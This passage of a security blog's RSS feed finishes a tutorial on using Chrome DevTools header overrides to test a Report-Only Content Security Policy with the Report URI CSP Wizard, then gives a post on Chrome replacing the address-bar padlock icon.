</code></pre><p></p><p>This policy won&apos;t block anything or break the page, because it&apos;s in Report-Only mode, but it will cause a report to be sent for every item on the page. That information, the reporting of every asset on the page, is what allows you to quickly and easily audit all of the resources loading across your site. Typically, this header would need to be deployed into production, but now, we can deploy it locally and get a huge amount of feedback in just a few seconds. </p><p>In the <a href="https://report-uri.com/account/policies/csp/?ref=scotthelme.co.uk">My Policies</a> section of Report URI, I&apos;m going to create a new policy called &quot;Scott Demo&quot; and enable the Wizard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-10.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1081" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-10.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-10.png 1000w, https://scotthelme.co.uk/content/images/2023/04/image-10.png 1081w" sizes="(min-width: 720px) 720px"></figure><p></p><p>From the <a href="https://report-uri.com/account/setup/?ref=scotthelme.co.uk">Setup</a> page I can get my unique reporting address that will need to be used in my CSPRO header, and then I&apos;m good to update the header override with the new values.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-11.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-11.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-11.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-11.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-11.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>As you can see, the page is back to normal now because the CSPRO header doesn&apos;t cause anything to be blocked, but the console is still indicating all of those CSP errors. 
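Each of those console errors also results in a violation report being sent, and a <code>report-uri</code> style report is just a small JSON payload; roughly speaking, and with hypothetical example values, a single report looks like this:</p><pre><code>{
  "csp-report": {
    "document-uri": "https://example.com/",
    "effective-directive": "img-src",
    "violated-directive": "img-src",
    "original-policy": "default-src &apos;none&apos;; form-action &apos;none&apos;; frame-ancestors &apos;none&apos;; report-uri https://{subdomain}.report-uri.com/r/d/csp/wizard",
    "blocked-uri": "https://example.com/image.png"
  }
}
</code></pre><p>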
</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-12.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-12.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-12.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-12.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-12.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>The crucial part here is the CSP reports have been sent as the <code>report-uri</code> directive was set, and you can see the reports in the Network tab.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-13.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-13.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-13.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-13.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-13.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>All I have to do now is head over to the <a href="https://report-uri.com/account/wizard/csp/?ref=scotthelme.co.uk">CSP Wizard</a> page and I can see all of the new items that have been detected and need my attention. From here, it&apos;s a simple case of deciding if each item is supposed to be there, in which case I can select the item and add it to my CSP, or, if it&apos;s not supposed to be there, I select it and block it, meaning it won&apos;t be added to my CSP.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-14.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1069" height="955" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-14.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-14.png 1000w, https://scotthelme.co.uk/content/images/2023/04/image-14.png 1069w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You&apos;ll need to click around a few pages on your site to make sure you&apos;re exercising all of the functionality, and by just skipping around a few pages, I managed to get a few more items reported. For example, my Disqus comment system only loads on blog posts and doesn&apos;t load on the homepage, for obvious reasons. I also only have YouTube videos embedded in certain blog posts so only those pages would report them. 
This is why we generally advise deploying the CSP Wizard in production for a day or so, but in just a few seconds, I&apos;ve gathered a heap of feedback about the resources on my site.</p><p>After approving the appropriate entries in the CSP Wizard, I now have the following in My Policies:</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-15.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1078" height="433" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-15.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-15.png 1000w, https://scotthelme.co.uk/content/images/2023/04/image-15.png 1078w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This is already a good chunk of the way towards generating a viable policy to use on my site. What I&apos;d do now is replace the policy in the header override rule with the one above, so those items are no longer being reported, reducing the volume of reports being sent, and continue browsing around. Eventually, you would be best off deploying this onto the live site, but the majority of the work has now been done in just a few minutes locally.</p><p>I think these header overrides are going to be really useful for people to play around with and test features like CSP without having to get their hands too dirty to start with. If you want to give the CSP Wizard a go, or try out any of our many features, you can sign up for a 30-day free trial over at <a href="https://report-uri.com/?ref=scotthelme.co.uk">Report URI</a> to get started!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Goodbye, old friend 👋🔒]]></title><description><![CDATA[<p>It&apos;s been a really long time coming, but, the end is finally here for the padlock icon in the address bar! &#x1F512;&#x1F6AB;</p><p></p><h4 id="a-long-road">A Long Road</h4><p>Wow, where do I start?! Whilst the dawn of the encrypted Web was in 1994, with the release of SSLv2.0, the</p>]]></description><link>https://scotthelme.co.uk/goodbye-old-friend/</link><guid isPermaLink="false">645175e210d19d003d7e008b</guid><category><![CDATA[HTTPS]]></category><category><![CDATA[chrome]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 03 May 2023 09:37:39 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/05/background-new-https-icon.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/05/background-new-https-icon.png" alt="Goodbye, old friend &#x1F44B;&#x1F512;"><p>It&apos;s been a really long time coming, but, the end is finally here for the padlock icon in the address bar! &#x1F512;&#x1F6AB;</p><p></p><h4 id="a-long-road">A Long Road</h4><p>Wow, where do I start?! Whilst the dawn of the encrypted Web was in 1994, with the release of SSLv2.0, the real transition to an encrypted Web didn&apos;t start until ~2014, a little after the Snowden revelations. 
If we look at the % of page loads that have used HTTPS on the Web, you can see when we started putting effort into the problem.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-1.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="1278" height="717" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-1.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-1.png 1000w, https://scotthelme.co.uk/content/images/2023/05/image-1.png 1278w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Note that we don&apos;t really have any reliable data prior to 2013 because nobody was paying attention, so that section of the graph is my best estimation, but from 2013 onwards we have multiple, reliable sources of data and the graph is accurate. </p><p></p><p>Along the way to an encrypted Web we&apos;ve come across <a href="https://scotthelme.co.uk/https-anti-vaxxers/?ref=scotthelme.co.uk">HTTPS Anti-Vaxxers</a>, <a href="https://scotthelme.co.uk/certificate-lifetime-capped-to-1-year-from-sep-2020/?ref=scotthelme.co.uk">shorter certificates</a>, <a href="https://scotthelme.co.uk/chrome-to-the-future/?ref=scotthelme.co.uk">warnings on HTTP sites</a>, <a href="https://scotthelme.co.uk/gone-for-ever/?ref=scotthelme.co.uk">the removal of the EV UI</a>, and countless other <a href="https://scotthelme.co.uk/tag/https/?ref=scotthelme.co.uk">major changes</a> in the industry that I&apos;ve documented well here on my blog. But now, the pi&#xE8;ce de r&#xE9;sistance, the padlock indicator, is to be retired after almost 30 years of service. To be clear, this was always inevitable. We&apos;ve seen the removal of the word &apos;Secure&apos;, removal of the green colour, removal of &apos;https://&apos; in the address bar and now, the removal of the padlock icon. The writing has been on the wall for a long time and there are now a lot of people out there who owe me $1 for losing our bet that 2023 would be the year the padlock was removed!</p><p></p><h4 id="an-update-on-the-lock-icon">An Update on the Lock Icon</h4><p>The blog post from Chromium, <a href="https://blog.chromium.org/2023/05/an-update-on-lock-icon.html?ref=scotthelme.co.uk">An Update on the Lock Icon</a>, is short and sweet. It details everything that you&apos;d expect from them, including research and links to sources for data, something that other industry players never seem to be able or willing to provide. But, without further ado, let me introduce you to the replacement for the padlock icon!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-2.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="288" height="288"></figure><p></p><p>This will be hitting desktop variants of Chrome from ~September 2023 and will follow on Android, but not iOS. For iOS, the padlock icon will be removed and will not be replaced by anything. The reasons given by Chromium for choosing this particular icon are:</p><p></p><!--kg-card-begin: markdown--><blockquote>
<p>We think the tune icon:</p>
<ul>
<li>Does not imply &quot;trustworthy&quot;</li>
<li>Is more obviously clickable</li>
<li>Is commonly associated with settings or other controls</li>
</ul>
</blockquote>
<!--kg-card-end: markdown--><p></p><p>Whilst I can agree with those reasons, I think one of the most important sentences in the blog post is this one:</p><p></p><blockquote>Replacing the lock icon with a neutral indicator prevents the misunderstanding that the lock icon is associated with the trustworthiness of a page, and emphasises that security should be the default state in Chrome.</blockquote><p></p><p>The issues of &quot;trust&quot;, and what that word really means, along with other confusions around connection security indicators, have long plagued the Web, but no more. In addition, the pursuit of a default secure world is one that simply cannot be argued with, and anything that moves us towards that reality, including our UI state, is something I&apos;m on board with. I&apos;ve enabled the new indicator in my browser just to see what it looks like and, I have to say, it convinced me even more that this is a step in the correct direction.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-3.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="1158" height="574" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-3.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-3.png 1000w, https://scotthelme.co.uk/content/images/2023/05/image-3.png 1158w" sizes="(min-width: 720px) 720px"></figure><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-4.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="406" height="155"></figure><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-5.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="460" height="293"></figure><p></p>]]></content:encoded></item></channel></rss>